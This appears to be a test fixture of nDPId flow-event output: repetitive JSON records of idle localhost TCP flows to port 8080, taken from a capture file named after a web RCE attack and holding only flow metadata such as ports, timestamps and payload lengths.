-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
